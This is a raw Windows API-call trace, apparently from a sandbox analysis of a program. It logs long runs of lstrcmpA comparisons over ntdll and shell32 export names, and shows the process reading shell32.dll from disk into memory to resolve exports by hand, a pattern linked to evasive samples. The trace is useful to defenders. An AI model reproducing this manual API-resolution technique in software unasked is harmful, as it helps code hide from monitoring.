lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.353] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.354] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0263.354] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.355] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.356] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.356] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0263.356] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0263.356] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0263.356] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0263.356] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0263.357] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0263.357] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0263.357] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0263.357] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0263.357] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.357] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.357] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0263.358] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.358] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0263.359] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0263.360] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0263.360] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0263.360] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0263.360] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0263.360] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0263.360] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0263.360] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0263.361] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0265.886] GetProcessHeap () returned 0x400000 [0265.886] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x3ffc040 | out: hHeap=0x400000) returned 1 [0265.895] GetProcessHeap () returned 0x400000 [0265.895] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x419140 [0265.895] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0265.895] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0265.896] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0265.896] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0265.897] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0265.898] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0265.898] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0265.898] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0265.898] GetProcessHeap () returned 0x400000 [0265.898] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1587258) returned 0x3ff3040 [0266.237] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0266.237] ReadFile (in: hFile=0x140, lpBuffer=0x3ff3040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3ff3040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0270.706] CloseHandle (hObject=0x140) returned 1 [0270.706] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0270.706] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0270.706] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0270.706] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0270.706] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0270.707] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0270.707] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0270.707] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0270.707] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.707] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0270.707] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0270.707] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0270.707] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.707] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0270.707] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0270.707] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0270.707] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0270.707] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.707] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0270.707] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.707] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0270.707] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0270.707] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0270.708] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.708] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0270.708] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0270.708] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.708] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0270.708] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0270.708] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0270.708] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.708] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0270.708] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.708] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.708] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0270.708] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0270.708] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0270.708] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0270.708] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.708] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0270.708] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.708] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.708] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0270.708] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0270.708] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0270.708] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.709] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0270.709] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.709] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.709] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 